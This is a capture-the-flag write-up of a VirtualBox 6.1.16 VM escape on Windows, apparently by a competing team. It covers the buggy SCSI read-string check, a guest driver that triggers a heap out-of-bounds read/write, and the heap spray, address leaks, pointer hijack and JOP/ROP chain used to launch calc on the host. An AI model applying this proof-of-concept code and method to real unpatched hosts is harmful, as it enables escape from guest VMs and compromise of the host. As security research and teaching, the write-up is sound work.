Escaping VirtualBox 6.1: Virtual Machine Escape Exploit
This post is about a VirtualBox VM escape exploit that existed in VirtualBox 6.1.16 on Windows.
Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.
Let’s get to some pwning 😀
Discovering the Vulnerability
The challenge description already hints at where a bug might be:
Goal:
Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.
You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.
But you can’t do anything in the host, including modifying the guest configuration file, etc.
Hint: SCSI controller is enabled and marked as bootable.
Environment:
In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:
- VirtualBox:6.1.16-140961-Win_x64.
- Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
- Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.
The only special thing about the VM is that the SCSI
driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.
Here are the operations the SCSI
device supports:
// /src/VBox/Devices/Storage/DevBusLogic.cpp
// [...]
if (fBootable)
{
/* Register I/O port space for BIOS access. */
rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
buslogicR3BiosIoPortWrite, // Write a byte
buslogicR3BiosIoPortRead, // Read a byte
buslogicR3BiosIoPortWriteStr, // Write a string
buslogicR3BiosIoPortReadStr, // Read a string
NULL /*pvUser*/,
"BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
// [...]
}
// [...]
The SCSI
device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.
While auditing the vboxscsiReadString
function, tsuro and spq found something interesting:
// src/VBox/Devices/Storage/VBoxSCSI.cpp
/**
* @retval VINF_SUCCESS
*/
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
RT_NOREF(pDevIns);
LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));
/*
* Check preconditions, fall back to non-string I/O handler.
*/
Assert(*pcTransfers > 0);
/* Read string only valid for data in register. */
AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);
/* Accesses without a valid buffer will be ignored. */
AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);
/* Check state. */
AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
Assert(!pVBoxSCSI->fBusy);
RTCritSectEnter(&pVBoxSCSI->CritSect);
/*
* Also ignore attempts to read more data than is available.
*/
uint32_t cbTransfer = *pcTransfers * cb;
if (pVBoxSCSI->cbBufLeft > 0)
{
Assert(cbTransfer <= pVBoxSCSI->cbBuf); // --- [1] ---
if (cbTransfer > pVBoxSCSI->cbBuf)
{
memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
cbTransfer = pVBoxSCSI->cbBuf; /* Ignore excess data (not supposed to happen). */
}
/* Copy the data and adance the buffer position. */
memcpy(pbDst,
pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf, // --- [2] ---
cbTransfer);
/* Advance current buffer position. */
pVBoxSCSI->iBuf += cbTransfer;
pVBoxSCSI->cbBufLeft -= cbTransfer; // --- [3] ---
/* When the guest reads the last byte from the data in buffer, clear
everything and reset command buffer. */
if (pVBoxSCSI->cbBufLeft == 0) // --- [4] ---
vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
}
else
{
AssertFailed();
memset(pbDst, 0, cbTransfer);
}
*pcTransfers = 0;
RTCritSectLeave(&pVBoxSCSI->CritSect);
return VINF_SUCCESS;
}
We can fully control cbTransfer
in this function. The function initially makes sure that we’re not trying to read more than the buffer size [1]
. Then, it copies cbTransfer
bytes from the global buffer into another buffer [2]
, which will be sent to the guest driver. Finally, cbTransfer
bytes get subtracted from the remaining size of the buffer [3]
and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.
So much for the logic, but what’s the issue here? There is a check at [1]
that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in [1]
won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in [3]
to underflow and cbBufLeft
will be set to UINT32_MAX-1
. This same cbBufLeft
will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.
Getting OOB read/write
We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.
Here’s how we triggered the bug:
void exploit() {
static const uint8_t cdb[1] = {0};
static const short port_base = 0x434;
static const uint32_t buffer_size = 1024;
// reset the state machine
__outbyte(port+3, 0);
// initiate a write operation
__outbyte(port+0, 0); // TargetDevice (0)
__outbyte(port+0, 1); // direction (to device)
__outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
__outbyte(port+0, buffer_size); // bugger length low
__outbyte(port+0, buffer_size >> 8); // buffer length mid
for(int i = 0; i < sizeof(cdb); i++)
__outbyte(port+0, cdb[i]);
// move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
char buf[buffer_size];
__inbytestring(port+1, buf, buffer_size - 1) // Read bufsize-1
__inbytestring(port+1, buf, 9) // Read 9 more bytes
for(int i = 0; i < sizeof(buf); i += 4)
*((uint32_t*)(&buf[i])) = 0xdeadbeef
for(int i = 0; i < 10000; i++)
__outbytestring(port+1, buf, sizeof(buf))
}
The driver first has to initiate the SCSI
state machine with a bufsize
. Then we read bufsize-1
bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8
with 0xdeadbeef
.
After loading this driver in the win7 guest, this is what we get:
As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req
struct via an IOCTL
:
enum operations {
OPERATION_OUTBYTE = 0,
OPERATION_INBYTE = 1,
OPERATION_OUTSTR = 2,
OPERATION_INSTR = 3,
};
typedef struct {
volatile unsigned int port;
volatile unsigned int operation;
volatile unsigned int data_byte_out;
} Req;
This enables us to use the driver as a bridge to communicate with the SCSI
device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).
The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!
Leaking vboxc.dll
and heap addresses
We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.
This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:
- Contains a pointer into a dll
- Contains a heap address
- (Contains some kind of function pointer which might get useful later on)
After going through some options, we eventually opted for an HGCMMsgCall
spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:
class HGCMMsgCall: public HGCMMsgHeader
{
// A list of parameters including a
// char[] with controlled contents
VBOXHGCMSVCPARM *paParms;
// [...]
};
class HGCMMsgHeader: public HGCMMsgCore
{
public:
// [...]
/* Port to be informed on message completion. */
PPDMIHGCMPORT pHGCMPort;
};
typedef struct PDMIHGCMPORT
{
// [...]
/**
* Checks if @a pCmd was cancelled.
*
* @returns true if cancelled, false if not.
* @param pInterface Pointer to this interface.
* @param pCmd The command we're checking on.
*/
DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
// [...]
} PDMIHGCMPORT;
class HGCMMsgCore : public HGCMReferencedObject
{
private:
// [...]
/** Next element in a message queue. */
HGCMMsgCore *m_pNext;
/** Previous element in a message queue.
* @todo seems not necessary. */
HGCMMsgCore *m_pPrev;
// [...]
};
It contains a VTable
pointer, two heap pointers (m_pNext
and m_pPrev
) because HGCMMsgCall
objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback
so HGCMMsgCall
definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled
pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall
’s size is 0x70
, so we’ll have to initiate the SCSI
state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.
Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall
objects.
Calling niklas’ wait_prop
function will allocate a HGCMMsgCall
object with a controlled pszPatterns
field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.
Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:
- We iterate 64 times
- Each time we create a client and spray 16
HGCMMsgCall
s
That way, we seemed to reliably get a bunch of the HGCMMsgCall
s ahead of our leak object which allows us to read and write their fields.
First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall
and read the first quad-word of said object. The VTable
points into VBoxC.dll
so we can use this leak to calculate the base address of VBoxC.dll
for future use.
Getting the heap leak is not as straight forward. We can easily read the m_pNext
or m_pPrev
fields to get a pointer to some other HGCMMsgCall
object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext
and m_pPrev
of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A
to it’s next neighbor B
.
This works because of this property:
addr(B) - addr(A) == A->m_pNext - B->m_pPrev
To get the address of B
, we have to do the following:
- Read object
A
and save the pointers - Take note of how many bytes we had to read until we found the next object
B
in a variablex
- Read object
B
and save the pointers - If
A->m_pNext - B->m_pPrev == x
we most likely found the right neighbor and know thatB
is atA->m_pNext
. If not, we just keep reading objects
This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll
base address leak, we can move on to hijacking the execution flow.
Getting RIP control
Remember those pfnIsCmdCancelled
callbacks? Those will make for a very short “Getting RIP control” section… 😛
There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCall
s and overwrite m_pfnCallback
. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled
field.
/**
* @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
*/
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
AssertPtrReturn(pMsgHdr, false);
PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
AssertPtrReturn(pCmd, false);
PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort; // We corrupted pHGCMPort
AssertPtrReturn(pHgcmPort, false);
return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd); // --- Profit ---
}
Internally, svcHlpIsCallCancelled
will load pHgcmPort
into r8
and execute a jmp [r8+0x10]
instruction. Here’s what happens if we corrupt m_pfnCallback
with 0x0000000041414141
:
Code execution
At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets
which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec
one-gadget in VBoxC.dll
which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP (Jump-Oriented-Programming).
JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8
. An additional constraint is that since we only leaked a pointer from VBoxC.dll
we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.
Sounds easy enough, let’s see what we can come up with 😛
Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns
field in out spray for that. If we extend the pattern size to 0x70
bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68
bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.
After spending ~30min straight reading through VBoxC.dll
assembly together with localo, we finally came up with a way to get from r8
control to rsp
control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX
and any reading or uncontrolled writing operations to or from those registers will be ignored.
Let’s assume the JOP payload in our string is located at 0x1230
and r8
points to it. We trigger the callback, which will execute the jmp [r8+0x10]
. You can click through the slides to understand what happens:
We managed to get rsp
to point into our string and the next ret
will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00")
ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll
’s IAT
. The IAT
is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll
. Then we can calculate the runtime address of WinExec()
in kernel32.dll
, set rcx
to point to "calc\x00"
and call WinExec
which will pop a calculator.
However there is a little twist to this. A keen eye might have noticed that we set rbp
to 0x10000000
and that we are using a leave; jmp rax
gadget to get to WinExec
in rop_gadget_5
instead of just a simple jmp rax
. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec
with the stack pointer still pointing into our heap payload. It turns out, that WinExec
sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram
section which has weak randomisation and it turns out that the range from 0xcb10000
to 0x13220000
is always mapped by that section. So if we set rbp
to 0x10000000
and call a leave; jmp rax
it will set the stack pointer to 0x10000000
before calling WinExec
and thereby giving it enough space to do all the stack setup it likes 😉
Demo
‘nuff said! Here’s the demo:https://www.youtube.com/embed/mjKxafMbpS0
You can find this version of our exploit here.
Credits
Writing this exploit was a joint effort of a bunch of people.
- ESPR’s spq, tsuro and malle who don’t need an introduction 😀
- My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo
- niklasb for his prior work and for some helpful pointers!
“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”
~ Niklas Baumstark (2021)
I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you 😀
Conclusion
This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox.